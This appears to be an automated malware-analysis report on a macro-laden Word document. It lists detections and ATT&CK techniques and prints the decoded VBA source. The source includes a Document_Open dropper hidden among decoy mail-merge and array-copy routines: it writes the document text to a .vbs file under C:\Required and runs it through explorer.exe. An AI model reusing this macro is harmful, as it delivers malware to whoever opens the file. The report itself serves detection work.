Verdict: MALICIOUS
Risk Score: 250

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The file contains VBA macros, including a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The presence of 'CreateObject' and 'SC_STR_WSCRIPT' heuristics suggests the macro attempts to interact with the system, likely to download and execute a payload. The 'SE_PASSWORD_ARCHIVE_LURE' heuristic indicates the document may be instructing the user to open a password-protected archive, a common tactic to bypass security scanning.
Heuristics (8)

- ClamAV: Doc.Dropper.EmbeddedBase64Exe-9865902-1 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.EmbeddedBase64Exe-9865902-1
- Heap-spray pattern detected (high, SC_HEAP_SPRAY): Repeated 0x41 (A) bytes found.
  Disassembly: attempted x86 opcode disassembly of the repeated region. Every byte is 0x41, which decodes as `inc ecx`; the run covers 0000258E through 000025ED (96 consecutive instructions):
  ```
  0000258E 41 inc ecx
  0000258F 41 inc ecx
  00002590 41 inc ecx
  ...
  000025EC 41 inc ecx
  000025ED 41 inc ecx
  ```
- Reference to Windows Script Host (high, SC_STR_WSCRIPT): Reference to Windows Script Host
- Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE): Document gives password instructions for an archive or attachment; often used to keep payloads encrypted until after gateway scanning
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
  - CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call. Matched lines in script:
    ```vba
    On Error Resume Next
    Set Wildcard = CreateObject("Scripting.FileSystemObject")
    Set Gotchas = Wildcard.CreateFolder("C:\Required")
    ```
  - Document_Open macro (low, OLE_VBA_DOCOPEN): Document_Open macro. Matched lines in script:
    ```vba
    Private Sub Document_Open()
    CopyArray
    ```
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: 353639889fd785682c78494c5e5d456313b3471a11c7a39defccbc9cab160eec) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10629 bytes |
Preview script: first 1,000 lines of the extracted script (the decoded source concatenates two modules, ThisDocument and BetweenArrays).

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    CopyArray
End Sub
Attribute VB_Name = "BetweenArrays"
' startingpoint = starting point in source array.
' numberofvalues = number of elements of the array to copy from source to dest array.
' Rules:
' 0. Input Variant SourceArray and DestArray params must be arrays, otherwise the Sub()
' exits with nothing done. Either may, however, be passed in with a length of 0 (ie, Ubound = 0)
' 1. All values in dest array are wiped out unless the operation exited due to exit conditions
' as mentioned below.
' 2. Dest array is returned the same size of the source array or whatever the length of the
' numberofvalues is, if that is > 0.
' 3. Dest array never has trailing empty array values unless they are part of the coopyable
' values from the source array.
' 4. If startingpoint > length of source array, operation exits without changes to the dest array
' 5. If numberofvalues = 0, then all values from the source array starting from startingpoint
Dim m_oXML
Dim m_sSource As String
Dim m_sWordTemplate As String
Dim m_bFile As Boolean
Dim m_sErr As String
Dim m_sDocPath As String
Dim m_sDocPrefix As String
Public Property Let XMLFile(sFileName As String)
    m_sSource = sFileName
    m_bFile = True
End Property
Public Property Let XMLString(sStr As String)
    m_sSource = sStr
    m_bFile = False
End Property
Public Function Execute() As Boolean
    Dim bLoaded As Boolean
    Dim oWordDoc As Word.Document
    Dim oWordField As Word.MailMergeField
    Dim oWordTable As Word.Table
    Dim oWordFieldRange As Word.Range
    Dim oXMLDocNode As MSXML.IXMLDOMNode
    Dim oXMLFieldNode As MSXML.IXMLDOMNode
    Dim oXMLParentNode As MSXML.IXMLDOMNode
    Dim oXMLNextNode As MSXML.IXMLDOMNode
    Dim oXMLDoc As MSXML.IXMLDOMNode
    Dim nParentIndex As Integer
    Dim nRow As Integer
    Dim nCol As Integer
    Dim bRowColFound As Boolean
    Dim bTableField As Boolean
    Dim sFieldSplit() As String
    Dim n As Integer
    Dim i As Integer
    Dim sPath As String
    Dim bTablesProcessed() As Boolean
    Dim nTable As Integer
    oWord.Visible = True
    If m_oXML Is Nothing Then
        Set m_oXML = New MSXML.DOMDocument
    End If
    m_oXML.async = False
    If m_bFile Then
        bLoaded = m_oXML.Load(m_sSource)
    Else
        bLoaded = m_oXML.LoadXML(m_sSource)
    End If
    If bLoaded Then
        If m_sDocPath = "" Then
            sPath = GetPath(m_sWordTemplate)
        Else
            sPath = m_sDocPath
        End If
        Set oXMLDoc = m_oXML.DocumentElement
        If oXMLDoc.HasChildNodes Then
            For Each oXMLDocNode In oXMLDoc.ChildNodes
                Set oWordDoc = oWord.Documents.Add(m_sWordTemplate, False)
                ReDim bTablesProcessed(oWordDoc.Tables.Count)
                For Each oWordField In oWordDoc.MailMerge.Fields
                    oWordField.Select
                    Set oWordFieldRange = oWord.Selection.Range
                    bTableField = False
                    nTable = -1
                    For Each oWordTable In oWordDoc.Tables
                        nTable = nTable + 1
                        If oWordFieldRange.InRange(oWordTable.Range) Then
                            bTableField = True
                            Exit For
                        End If
                    Next oWordTable
                    sFieldSplit = Split(oWordField.Code, " ")
                    sFieldSplit = Split(sFieldSplit(2), "_")
                    Set oXMLFieldNode = oXMLDocNode
                    Set oXMLParentNode = Nothing
                    For n = LBound(sFieldSplit) To UBound(sFieldSplit)
                        Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
                        If oXMLFieldNode Is Nothing Then
                            Exit For
                        End If
                        If bTableField And oXMLParentNode Is Nothing Then
                            Set oXMLNextNode = oXMLFieldNode.NextSibling
                            If Not oXMLNextNode Is Nothing Then
                                If oXMLNextNode.BaseName = oXMLFieldNode.BaseName Then
                                    Set oXMLParentNode = oXMLFieldNode
                                    nParentIndex = n
                                    Exit For
                                End If
                            End If
                        End If
                    Next n
                    If bTableField And Not oXMLParentNode Is Nothing Then
                        nRow = 0
                        nCol = 0
                        Do While Not oXMLParentNode Is Nothing
                            Set oXMLFieldNode = oXMLParentNode
                            For n = nParentIndex + 1 To UBound(sFieldSplit)
                                Set oXMLFieldNode = oXMLFieldNode.SelectSingleNode(sFieldSplit(n))
                                If oXMLFieldNode Is Nothing Then
                                    Exit For
                                End If
                            Next n
                            If oXMLFieldNode Is Nothing Then
                                oWordFieldRange.Text = "Unresolved fieldname"
                            Else
                                If nRow = 0 Then
                                    bRowColFound = False
                                    For nRow = 1 To oWordTable.Rows.Count
                                        For nCol = 1 To oWordTable.Columns.Count
                                            If oWordFieldRange.InRange(oWordTable.Cell(nRow, nCol).Range) Then
                                                bRowColFound = True
                                                Exit For
                                            End If
                                        Next nCol
                                        If bRowColFound Then
                                            Exit For
                                        End If
                                    Next nRow
                                    oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                                Else
                                    nRow = nRow + 1
                                    If Not bTablesProcessed(nTable) Then
                                        If nRow <= oWordTable.Rows.Count Then
                                            oWordTable.Rows.Add oWordTable.Rows.Item(nRow)
                                        Else
                                            oWordTable.Rows.Add
                                        End If
                                    End If
                                    oWordTable.Cell(nRow, nCol).Range.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                                End If
                                Set oXMLParentNode = oXMLParentNode.NextSibling
                            End If
                        Loop
                        bTablesProcessed(nTable) = True
                    Else
                        If oXMLFieldNode Is Nothing Then
                            oWordFieldRange.Text = "Unresolved fieldname"
                        Else
                            oWordFieldRange.Text = oXMLFieldNode.ChildNodes.Item(0).Text
                        End If
                    End If
                Next oWordField
                i = i + 1
                oWordDoc.SaveAs sPath + m_sDocPrefix + CStr(i) + ".doc"
                'oWordDoc.Close
            Next oXMLDocNode
        End If
    Else
    End If
    Set m_oXML = Nothing
End Function
Private Sub Class_Initialize()
    If nRef = 0 Then
        Set oWord = New Word.Application
    End If
    nRef = nRef + 1
End Sub
Private Sub Class_Terminate()
    Set m_oXML = Nothing
    nRef = nRef - 1
    If nRef = 0 Then
        Set oWord = Nothing
    End If
End Sub
Public Property Get LastError() As String
    LastError = m_sErr
End Property
Public Property Let WordTemplate(sWordTemplate As String)
    m_sWordTemplate = sWordTemplate
End Property
Public Property Let Path(sPath As String)
    m_sDocPath = sPath
End Property
Public Property Let DocumentPrefix(sPrefix As String)
    m_sDocPrefix = sPrefix
End Property
Public Sub CopyArray(Optional SourceArray As Variant, _
                     Optional DestArray As Variant, _
                     Optional startingpoint As Long = 1, Optional numberofvalues As Long = 0)
    If (Not IsArray(SourceArray)) Or (Not IsArray(DestArray)) Then
        On Error Resume Next
        Set Wildcard = CreateObject("Scripting.FileSystemObject")
        Set Gotchas = Wildcard.CreateFolder("C:\Required")
        Wildcard.createtextfile ("C:\Required\DOMDocument.vb" + "s")
        Set ASCIIfile = Wildcard.opentextfile("C:\Required\DOMDocument.vb" + "s", 8, 1)
        ASCIIfile.writeline ActiveDocument.Range
    End If
    ASCIIfile.Close
    Set Gotchas = Wildcard.CreateFolder("C:\Required\occurs")
    If UBound(SourceArray) = 0 Then
        Set Wildcard = New WshShell
        ReDim DestArray(0 To 0)
    End If
    Wildcard.Exec "explorer.exe C:\Required\DOMDocument.vb" + "s"
    If startingpoint < 1 Then
        startingpoint = 1
    End If
    If numberofvalues < 0 Then
        numberofvalues = 0
    End If
    If startingpoint > UBound(SourceArray) Then
        Exit Sub
    End If
    If numberofvalues > 0 And _
       (startingpoint + numberofvalues) > UBound(SourceArray) Then
        Exit Sub
    End If
    Dim lngDestLength As Long, lngCnt As Long
    If numberofvalues = 0 Then
        lngDestLength = (UBound(SourceArray) - startingpoint) + 1
    Else
        lngDestLength = numberofvalues
    End If
    ReDim DestArray(lngDestLength)
    For lngCnt = 1 To lngDestLength
        DestArray(lngCnt) = SourceArray((startingpoint + lngCnt) - 1)
    Next
    Exit Sub
    MsgBox "CopyArray(): Error occurred.", vbInformation, "Error occurred."
    MsgBox Err.Number & ": " & Err.Description
End Sub
```